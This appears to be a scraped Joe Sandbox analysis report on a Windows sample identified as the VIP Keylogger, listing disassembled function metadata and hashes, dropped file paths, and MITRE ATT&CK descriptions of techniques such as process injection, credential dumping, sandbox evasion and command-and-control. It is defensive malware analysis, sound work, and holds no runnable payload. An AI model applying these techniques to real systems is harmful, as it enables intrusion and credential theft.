Function 032EAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b9b88396f311ef961375ce899d5aa2f9b1ad40a78dd4a178f63cde7bf02393
Instruction ID: d4171685646aa1e3b6023aa60c30f361892319b986b7fb53decbc3ee967f9a0c
Opcode Fuzzy Hash: 05b9b88396f311ef961375ce899d5aa2f9b1ad40a78dd4a178f63cde7bf02393
Instruction Fuzzy Hash: F0D0677BB400089FCB059F98E8419DDF7B6FB98225B548127F915E7260C631A925DB90

Function 032E6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fe367d2447d4a25e9c8ee3b0d51da90132d39bc85b9adc996b61b206749673
Instruction ID: 8547d1e73be00acf2a2f3e0cc94fd21d69a5924761aa9444a77c1dc129fc0e9b
Opcode Fuzzy Hash: d6fe367d2447d4a25e9c8ee3b0d51da90132d39bc85b9adc996b61b206749673
Instruction Fuzzy Hash: DEC012385003154BD745EB79EC465A5336EE6D4305B40E560B4054D14AAE7C3D464A91

Non-executed Functions

Function 032E29E0 Relevance: 5.5, Strings: 4, Instructions: 470COMMON

Download Yara Rule

Strings

Xq, xrefs: 032E2A9E
Xq, xrefs: 032E2AD8
Xq, xrefs: 032E2BA4
Xq, xrefs: 032E2B57

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 71c789441145b71c7e56d1cdee3208097313e37d936e9e21e88ea31a38491649
Instruction ID: db2219628a8ba0c4652a393d992f6f8fe95458cb2b1532da3aa43e4f8a1f3b3c
Opcode Fuzzy Hash: 71c789441145b71c7e56d1cdee3208097313e37d936e9e21e88ea31a38491649
Instruction Fuzzy Hash: 49225D36806B55DBCB21CF68CC46256BFB1AF09308F6C095CD8DA97607E631B670CB96

Function 032EB570 Relevance: 5.2, Strings: 4, Instructions: 241COMMON

Download Yara Rule

Strings

5, xrefs: 032EB4FB
$q, xrefs: 032EB67E
Hq, xrefs: 032EB72A
$q, xrefs: 032EB68A

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: 5$Hq$$q$$q
API String ID: 0-3231494101
Opcode ID: 889ea4b9790757aaf2e8164202217990ae6b62f6fe6dfd21c8170f255b5600b6
Instruction ID: 5bb55d30544af4f8301682bc38266451082dcb61f6911c79fbb457629abff05c
Opcode Fuzzy Hash: 889ea4b9790757aaf2e8164202217990ae6b62f6fe6dfd21c8170f255b5600b6
Instruction Fuzzy Hash: BC71D2357242118FDF15EB3AD85A77E7AE6AFC464179C006AE806CB3A0DE74DC82C791

Function 032E2A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xq, xrefs: 032E2A9E
Xq, xrefs: 032E2AD8
Xq, xrefs: 032E2BA4
Xq, xrefs: 032E2B57

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 17a7e5dc199d71f6b7007d571b24edb136926ff4a027dced8304250bd504ae54
Instruction ID: 3c5ccffbd0b9129667433557f8b86a2b4f6591b71a28889a1d27ad68a04b7300
Opcode Fuzzy Hash: 17a7e5dc199d71f6b7007d571b24edb136926ff4a027dced8304250bd504ae54
Instruction Fuzzy Hash: 94315A71D1031ACBDF74DB6988927AFB6BEAB44310F5844A9C40AA7341DB7089C5CB92

Function 032E6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 032E692C
\;q, xrefs: 032E695E
\;q, xrefs: 032E6952
\;q, xrefs: 032E6936

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 7564de5dab604c4da084bb33762b9c9e682a70ab9ad09cc31efb50aa7cb400e3
Instruction ID: 015f0f54fa046c738ab025e3fb884cdcac41abc14a0f01f4ae7fade9626af39f
Opcode Fuzzy Hash: 7564de5dab604c4da084bb33762b9c9e682a70ab9ad09cc31efb50aa7cb400e3
Instruction Fuzzy Hash: F6014F317201168FC724CA2DC546A29F3EBAFA866076D41AAE407CF374DE71EC818751

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ti5nuRV7y4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ti5nuRV7y4.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aoTiGLRa.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mendrnb.y42.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vcj5ejc.fje.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2x1ep0z.br4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq4k5jdv.o5d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkaco3y0.awa.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neykyzxg.tay.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vabd1ibj.m4p.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wz3xsh5w.4mu.ps1

C:\Users\user\AppData\Local\Temp\tmpD06F.tmp

Windows Analysis Report
Ti5nuRV7y4.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre